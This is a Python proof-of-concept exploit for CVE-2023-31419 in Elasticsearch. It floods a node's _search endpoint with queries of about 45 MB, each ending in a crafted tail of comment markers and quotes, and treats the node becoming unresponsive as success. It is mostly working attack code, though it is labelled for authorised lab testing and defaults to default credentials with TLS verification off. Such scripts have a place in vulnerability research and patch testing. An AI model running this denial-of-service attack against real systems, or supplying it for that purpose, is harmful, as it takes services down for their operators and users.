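# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
#
# Proof of concept for CVE-2023-31419: repeatedly submits oversized _search
# requests (random filler followed by a crafted comment/escape tail) to an
# Elasticsearch node.  The interesting outcome is a node that stops
# answering, so the script treats a connection failure or timeout as a
# result rather than as a crash.  For authorised lab testing only.
import os
import random
import string
import sys

# Target and credentials.  Defaults match the original PoC; override them
# through the environment instead of editing the file so real credentials
# are not committed next to the exploit.
es_url = os.environ.get("ES_URL", "http://localhost:9200")  # Replace with your Elasticsearch server URL
index_name = os.environ.get("ES_INDEX", "*")
username = os.environ.get("ES_USER", "elastic")
password = os.environ.get("ES_PASS", "changeme")
auth = (username, password)

# TLS verification is OFF by default, as in the original script.  That is
# only acceptable against a throwaway lab node: with verification disabled
# the basic-auth credentials above can be captured by anyone on the path.
# Set ES_VERIFY_SSL=1 to verify the server certificate.
verify_ssl = os.environ.get("ES_VERIFY_SSL", "0") == "1"

num_queries = int(os.environ.get("ES_NUM_QUERIES", "100"))

# Seconds to wait for a connection / response.  Without a timeout the
# script blocks forever as soon as the node stops answering, which is
# exactly the condition this PoC is trying to trigger.
request_timeout = float(os.environ.get("ES_TIMEOUT", "60"))

# Crafted tail appended to every query string: 10000 comment openers,
# a single backslash, then 999 single quotes.
payload = "/*" * 10000 + "\\" + "'" * 999

# Random filler per query: SYMBOL_LEN characters repeated SYMBOL_REPEAT
# times, i.e. about 45 MB of text in every request body.  The node may
# reject bodies above its configured content-length limit -- check the
# error output if every query comes back non-200.
SYMBOL_LEN = 5000
SYMBOL_REPEAT = 9000
SYMBOL_ALPHABET = string.ascii_letters + string.digits + "^"


def random_symbols(length: int = SYMBOL_LEN) -> str:
    """Return ``length`` characters drawn uniformly from SYMBOL_ALPHABET.

    ``random`` (not ``secrets``) is deliberate: the filler only has to
    differ between queries, it is not a secret.
    """
    return "".join(random.choice(SYMBOL_ALPHABET) for _ in range(length))


def build_query(symbols: str, repeat: int = SYMBOL_REPEAT, tail: str = payload) -> dict:
    """Return the _search request body.

    The body is a ``match`` query on the ``message`` field whose value is
    ``symbols`` repeated ``repeat`` times followed by ``tail``.
    """
    return {"query": {"match": {"message": symbols * repeat + tail}}}


def report_response(query_no: int, response) -> None:
    """Print a summary of one completed _search response.

    Non-200 responses are reported with status and body text.  A 200 that
    is not JSON, or whose ``hits`` block is missing, is reported instead of
    raising, so one odd reply does not abort the run.
    """
    if response.status_code != 200:
        print(f"Error for query {query_no}: {response.status_code} - {response.text}")
        return
    try:
        results = response.json()
    except ValueError:
        print(f"Query {query_no}: non-JSON 200 response ({len(response.content)} bytes)")
        return
    print(f"Query {query_no} - Response:")
    print(results)
    hits = results.get("hits", {}) if isinstance(results, dict) else {}
    total = hits.get("total")
    # The original assumed total is a dict with a "value" key; fall back
    # to printing whatever was returned if the shape differs.
    total_value = total.get("value") if isinstance(total, dict) else total
    print(f"Query {query_no}: Total hits: {total_value}")
    for hit in hits.get("hits", []):
        # The original printed the literal text "{search_results}" here
        # (missing f-prefix); print the document source it extracted.
        print(f"Payload result: {hit.get('_source')}")


def main() -> int:
    """Send ``num_queries`` crafted searches and return a process exit code.

    Returns 0 when every query was answered, 2 when the target stopped
    answering (connection error or timeout) -- the outcome this PoC is
    looking for -- so the caller can tell the two apart.
    """
    # Imported here so the payload helpers above can be imported and
    # tested without the third-party dependency installed.
    import requests

    search_endpoint = f"{es_url}/{index_name}/_search"
    for query_no in range(1, num_queries + 1):
        body = build_query(random_symbols())
        print(f"Query {query_no} - Search Query:")
        try:
            response = requests.get(
                search_endpoint,
                json=body,
                verify=verify_ssl,
                auth=auth,
                timeout=request_timeout,
            )
        except requests.exceptions.Timeout:
            print(f"Query {query_no}: no response within {request_timeout}s - target may be unresponsive")
            return 2
        except requests.exceptions.ConnectionError as exc:
            print(f"Query {query_no}: connection failed ({exc}) - target may be down")
            return 2
        report_response(query_no, response)
    return 0


if __name__ == "__main__":
    sys.exit(main())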